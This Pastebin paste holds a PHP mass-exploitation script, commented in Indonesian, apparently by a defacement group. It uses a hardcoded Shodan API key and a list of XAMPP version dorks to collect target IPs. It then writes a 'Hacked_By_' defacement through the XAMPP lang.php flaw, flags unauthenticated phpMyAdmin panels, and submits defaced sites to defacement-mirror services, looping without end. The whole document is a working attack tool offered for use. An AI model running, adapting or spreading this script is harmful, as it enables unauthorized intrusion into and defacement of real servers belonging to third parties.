Advertisement
shor7cut

Auto Exploit : Lang dan Phpmyadmin [Final]

Jul 26th, 2015
817
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. date_default_timezone_set('asia/jakarta');
  5. shor7cut_scanner();
  6.  
  7. /* ------- FUNGSI AMBIL DATA TARGET DAN EKSEKUSI -----*/
  8. function shor7cut_scanner(){
  9. /* ------- CONFIG -----*/
  10. $api_key="z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
  11. $nama_hacker="Shor7cut";
  12. $nama_team="IndoXploit";
  13. $nama_file_target = "target-bu7sec.txt";
  14. $nama_laporan="Laporan.txt";
  15. unlink($nama_file_target);
  16. $nama_ouput_result_xampp="BUG7SEC-XAMPP.HTML"; // Gunakan TYPE FILE (*.HTML)
  17. $nama_ouput_result_phpmyadmin="BUG7SEC-PHPMYD.HTML"; // Gunakan TYPE FILE (*.HTML)
  18. $nama_log_xampp_lang="xampp.log7sec"; // AGAR TIDAK MENYIMPAN DATA YANG SAMA // gunakan .log7sec saja
  19. $nama_log_xampp_phpmyadmin="phpmyadmin.log7sec"; // AGAR TIDAK MENYIMPAN DATA YANG SAMA // gunakan .log7sec saja
  20. $conf_irm = "TRUE"; // TRUE or FALSE (Jika Sudah diisi semua conf , silahkan ganti menjadi TRUE)
  21. $versi_php = phpversion();
  22. $no=1;
  23. $no_target=1;
  24. $total_target=0;
  25. $total_xampp_vuln=0;
  26. $total_phpmyadmin_vuln=0;
  27. $waktu_start=date("d-m-Y h:i:sa");
  28. /* ------- CONFIG:END -----*/
  29. $logos.="\r\n------------------------------------------------------------\r\n";
  30. $logos.=" _________.__ _________ __ \r\n";
  31. $logos.=" / _____/| |__ __________\______ \ ____ __ ___/ |_ \r\n";
  32. $logos.=" \_____ \ | | \ / _ \_ __ \ / // ___\| | \ __\ \r\n";
  33. $logos.=" / \| Y ( <_> ) | \/ / /\ \___| | /| | \r\n";
  34. $logos.=" /_______ /|___| /\____/|__| /____/ \___ >____/ |__| \r\n";
  35. $logos.=" \/ \/ [ MULTY K.I.L.L.E.R ] \/ \r\n";
  36. $logos.="-------------------------------------------------------------\r\n";
  37. echo $logos;
  38. if($conf_irm=="FALSE"){
  39. echo "[PERINGATAN] -> Ops.. Config error\r\n";
  40. exit();
  41. }
  42. if($versi_php<="5.3.0"){
  43. echo "Ops... Silahkan Upgrade versi PHP anda.\r\n";
  44. exit();
  45. }
  46.  
  47. $dork = array (
  48. 'xampp',
  49. 'xampp Apache/2.2.3',
  50. 'xampp Apache/2.2.4',
  51. 'xampp Apache/2.2.6',
  52. 'xampp Apache/2.2.8',
  53. 'xampp Apache/2.2.9',
  54. 'xampp Apache/2.2.11',
  55. 'xampp Apache/2.2.12',
  56. 'xampp Apache/2.2.14',
  57. 'xampp Apache/2.2.17',
  58. 'xampp Apache/2.2.21',
  59. 'xampp Apache/2.4.2',
  60. 'xampp Apache/2.4.3',
  61. 'xampp Apache/2.4.10',
  62. 'xampp Apache/2.4.12',
  63. 'xampp PHP/5.2.1',
  64. 'xampp PHP/5.2.2',
  65. 'xampp PHP/5.2.3',
  66. 'xampp PHP/5.2.4',
  67. 'xampp PHP/5.2.5',
  68. 'xampp PHP/5.2.6',
  69. 'xampp PHP/5.2.8',
  70. 'xampp PHP/5.2.9',
  71. 'xampp PHP/5.3.0',
  72. 'xampp PHP/5.3.1',
  73. 'xampp PHP/5.3.5',
  74. 'xampp PHP/5.3.8',
  75. 'xampp PHP/5.4.4',
  76. 'xampp PHP/5.4.7',
  77. 'xampp PHP/5.4.31',
  78. 'xampp PHP/5.5.15',
  79. 'xampp PHP/5.5.19',
  80. 'xampp PHP/5.6.3',
  81. 'xampp PHP/5.5.24',
  82. 'xampp PHP/5.6.8',
  83. 'xampp PHP/4.4.5',
  84. 'xampp PHP/4.4.6',
  85. 'xampp PHP/4.4.7',
  86. 'xampp PHP/4.4.8',
  87. 'xampp PHP/4.4.9'
  88. ); $total_dork = count($dork);
  89. echo proses("halaman_depan");
  90. $get = file_get_contents("https://api.shodan.io/account/profile?key={$api_key}");
  91. $json = json_decode($get,true);
  92. echo proses("halaman_info");
  93. $status_akun .="--------------------------------\r\n";
  94. $status_akun .="-> Nama : ".$json['display_name']."\r\n";
  95. $status_akun .="-> SALDO : ".$json['credits']."\r\n";
  96. $status_akun .="-> INFO : ".count($dork)." DORK\r\n";
  97. $status_akun .="--------------------------------\r\n";
  98. echo $status_akun;
  99. echo proses("mencari_target");
  100. /* MENCARI TARGET DAN MENYIMPAN TARGET*/
  101. foreach ($dork as $dorks) {
  102. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api_key}&query={$dorks}");
  103. $json = json_decode($get,true);
  104. $target_live = $json['total'];
  105. foreach ($json['matches'] as $key => $value) {
  106.  
  107. $fp = fopen($nama_file_target, 'a+');
  108. fwrite($fp, $value['ip_str']."|");
  109. fclose($fp);
  110.  
  111. }
  112. if($target_live>100){
  113. $target_live=100;
  114. }
  115. $total_target=$target_live+$total_target;
  116. echo "[CARI TARGET] -> $no of $total_dork [Live Target : $target_live | Total Target : $total_target]\r\n";
  117. $no++;
  118. }
  119. echo "[INFO] Total Target : $total_target\r\n";
  120. /* MENGEKSEKUSI TARGET*/
  121. echo proses("loading_target");
  122. $buka_file = fopen($nama_file_target, "r");
  123. $baca_file = fgets($buka_file);
  124. $target = explode("|", $baca_file);
  125. echo proses("loading_eksekusi");
  126. foreach ($target as $sites) {
  127. $format_url_1 = "$sites/xampp/lang.php?Hacked_By_$nama_hacker";
  128. $format_url_2 = "$sites/security/lang.php?Hacked_By_$nama_hacker";
  129. $patch_result1 = "$sites/xampp/lang.tmp?";
  130. $patch_result2 = "$sites/security/lang.tmp?";
  131. $phpmyadmin_url = "$sites/phpmyadmin/querywindow.php";
  132.  
  133. $curl_xampp_1 = curl_init($format_url_1);
  134. curl_setopt($curl_xampp_1, CURLOPT_FAILONERROR, true);
  135. curl_setopt($curl_xampp_1, CURLOPT_FOLLOWLOCATION, true);
  136. curl_setopt($curl_xampp_1, CURLOPT_RETURNTRANSFER, true);
  137. curl_setopt($curl_xampp_1, CURLOPT_CONNECTTIMEOUT ,0);
  138. curl_setopt($curl_xampp_1, CURLOPT_TIMEOUT, 30);
  139. $result_xampp_1 = curl_exec($curl_xampp_1);
  140.  
  141. $curl_xampp_2 = curl_init($format_url_1);
  142. curl_setopt($curl_xampp_2, CURLOPT_FAILONERROR, true);
  143. curl_setopt($curl_xampp_2, CURLOPT_FOLLOWLOCATION, true);
  144. curl_setopt($curl_xampp_2, CURLOPT_RETURNTRANSFER, true);
  145. curl_setopt($curl_xampp_2, CURLOPT_CONNECTTIMEOUT ,0);
  146. curl_setopt($curl_xampp_2, CURLOPT_TIMEOUT, 30);
  147. $result_xampp_2 = curl_exec($curl_xampp_2);
  148.  
  149.  
  150. $phpmyn = curl_init("$phpmyadmin_url");
  151. curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
  152. curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
  153. curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
  154. curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
  155. curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
  156. $phpmynresult = curl_exec($phpmyn);
  157.  
  158.  
  159.  
  160. echo "[Scan Target]-> TARGET : $sites <$no_target/$total_target>\r\n";
  161. if(eregi("Hacked_By_",$result_xampp_1))
  162. {
  163. echo "[Scan Target]-> XAMPP : vulnerability | xampp/lang.tmp\r\n";
  164. echo $phpmyadmin_status;
  165. echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result1,$nama_hacker,$nama_team);
  166. echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
  167. $total_xampp_vuln++;
  168. }
  169. else if(eregi("Hacked_By_",$result_xampp_2))
  170. {
  171. echo "[Scan Target]-> XAMPP : vulnerability | security/lang.tmp\r\n";
  172. echo $phpmyadmin_status;
  173. echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result2,$nama_hacker,$nama_team);
  174. echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
  175. $total_xampp_vuln++;
  176. }else {
  177. echo $phpmyadmin_status;
  178. echo "[Scan Target]-> XAMPP : Not vulnerability\r\n";
  179. }
  180.  
  181. $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
  182. if(preg_match($re, $phpmynresult, $matches)){
  183. if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
  184. echo "[Scan Target]->PhpMyadmin : Not vulnerable (Auth)\r\n\n";
  185. }else {
  186. echo "[Scan Target]->PhpMyadmin : vulnerable\r\n";
  187. echo "[Scan Target]->PhpMyadminDB : ".simpan_result_phpmyadmin($phpmyadmin_url,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin);
  188. $total_phpmyadmin_vuln++;
  189. }
  190. }else {
  191. echo "[Scan Target]->PhpMyadmin : Not vulnerable\r\n\n";
  192. }
  193.  
  194.  
  195. flush();
  196. ob_flush();
  197. sleep(2);
  198. $no_target++;
  199. }
  200.  
  201. $lapor.="\r\n\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
  202. $lapor.="-> SCAN START - END : ".$waktu_start."/".date("d-m-Y h:i:sa")."\r\n";
  203. $lapor.="-> Total Target : ".$total_target."\r\n";
  204. $lapor.="-> Total Xampp Vuln : ".$total_xampp_vuln."\r\n";
  205. $lapor.="-> Total PHPMYADMIN Vuln : ".$total_phpmyadmin_vuln."\r\n";
  206. $lapor.="\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
  207. $fp = fopen($nama_laporan, 'a+');
  208. fwrite($fp, $lapor);
  209. fclose($fp);
  210.  
  211. reload(); // reload senjata
  212.  
  213. } /* AKHIR FUNGSI*/
  214. function reload(){
  215. shor7cut_scanner();
  216. }
  217.  
  218.  
  219. function submit_mirror($sites,$nama_hacker,$nama_team){
  220. $url = "http://$sites";
  221. $post = array(
  222. "hacker" => "$nama_hacker",
  223. "team" => "$nama_team",
  224. "url" => "$url",
  225. "poc" => "Other Web Application Bug",
  226. "key" => "kucing",
  227. "secret" => "tai",
  228. );
  229. $cubits = curl_init ("http://zone-db.com/notify_act.php");
  230. curl_setopt($cubits, CURLOPT_HEADER, 1);
  231. curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
  232. curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
  233. curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
  234. curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
  235. curl_setopt($cubits,CURLOPT_TIMEOUT,10);
  236. curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
  237. curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
  238. curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
  239. curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
  240. $result_mirror = curl_exec($cubits);
  241.  
  242. if (preg_match("#added#is", $result_mirror)){
  243. $status_zonedb.= "Zone-DB [OK] | ";
  244. }else{
  245. $status_zonedb.= "Zone-DB [FAIL] | ";
  246. }
  247. $cubit = curl_init ();
  248. curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
  249. curl_setopt ($cubit, CURLOPT_POST, 1);
  250. curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
  251. curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
  252. curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$nama_hacker&site=$url&how=1&why=1&addsite=Send");
  253. if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
  254. $status_zonedb.= "Aljyyosh [OK]\r\n";
  255. }else {
  256. $status_zonedb.= "Aljyyosh [Fail]\r\n";
  257. }
  258. return $status_zonedb;
  259. }
  260.  
  261. function simpan_result_xampp($sites,$nama_ouput_result_xampp,$nama_log_xampp_lang){
  262. $buka_log_xampp = file_get_contents($nama_log_xampp_lang);
  263. $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
  264. $hasil_log = "http://".$sites."\r\n";
  265. if(!eregi($sites, $buka_log_xampp)){
  266. // simpan hasil result
  267. $fp = fopen($nama_ouput_result_xampp, 'a+');
  268. fwrite($fp, $hasil);
  269. fclose($fp);
  270. // simpan hasil ke log
  271. $fp = fopen($nama_log_xampp_lang, 'a+');
  272. fwrite($fp, $hasil_log);
  273. fclose($fp);
  274. $status_simpan.="Telah Disimpan\r\n";
  275. }else {
  276. $status_simpan="Tidak Tersimpan\r\n";
  277. }
  278. return $status_simpan;
  279. }
  280.  
  281. function simpan_result_phpmyadmin($sites,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin){
  282. $buka_log_xampp = file_get_contents($nama_log_xampp_phpmyadmin);
  283. $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
  284. $hasil_log = "http://".$sites."\r\n";
  285. if(!eregi($sites, $buka_log_xampp)){
  286. // simpan hasil result
  287. $fp = fopen($nama_ouput_result_phpmyadmin, 'a+');
  288. fwrite($fp, $hasil);
  289. fclose($fp);
  290. // simpan hasil ke log
  291. $fp = fopen($nama_log_xampp_phpmyadmin, 'a+');
  292. fwrite($fp, $hasil_log);
  293. fclose($fp);
  294. $status_simpan="Telah Disimpan\r\n\n";
  295. }else {
  296. $status_simpan="Tidak Tersimpan\r\n\n";
  297. }
  298. return $status_simpan;
  299. }
  300.  
  301.  
  302. function proses($status){
  303. switch ($status) {
  304. case 'mencari_target':
  305. echo "INFO-> Mencari Target ";
  306. for ($i=0; $i <3; $i++) {
  307. echo ".";
  308. sleep(1);
  309. }
  310. echo "\r\n\n";
  311. break;
  312. case 'halaman_depan':
  313. echo "INFO-> Mohon menunggu ";
  314. for ($i=0; $i <3; $i++) {
  315. echo ".";
  316. sleep(1);
  317. }
  318. echo "\r\n";
  319. break;
  320.  
  321. case 'halaman_info':
  322. echo "INFO-> Mengambil data API ";
  323. for ($i=0; $i <3; $i++) {
  324. echo ".";
  325. sleep(1);
  326. }
  327. echo "\r\n";
  328. break;
  329.  
  330. case 'loading_target':
  331. echo "INFO-> Memuat Target ";
  332. for ($i=0; $i <3; $i++) {
  333. echo ".";
  334. sleep(1);
  335. }
  336. echo "\r\n";
  337. break;
  338.  
  339. case 'loading_eksekusi':
  340. echo "INFO-> Mulai mengeksekusi Target ";
  341. for ($i=0; $i <3; $i++) {
  342. echo ".";
  343. sleep(1);
  344. }
  345. echo "\r\n\n";
  346. break;
  347.  
  348.  
  349. default:
  350. # code...
  351. break;
  352. }
  353. }
  354.  
  355. ?>
Advertisement
RAW Paste Data Copied
Advertisement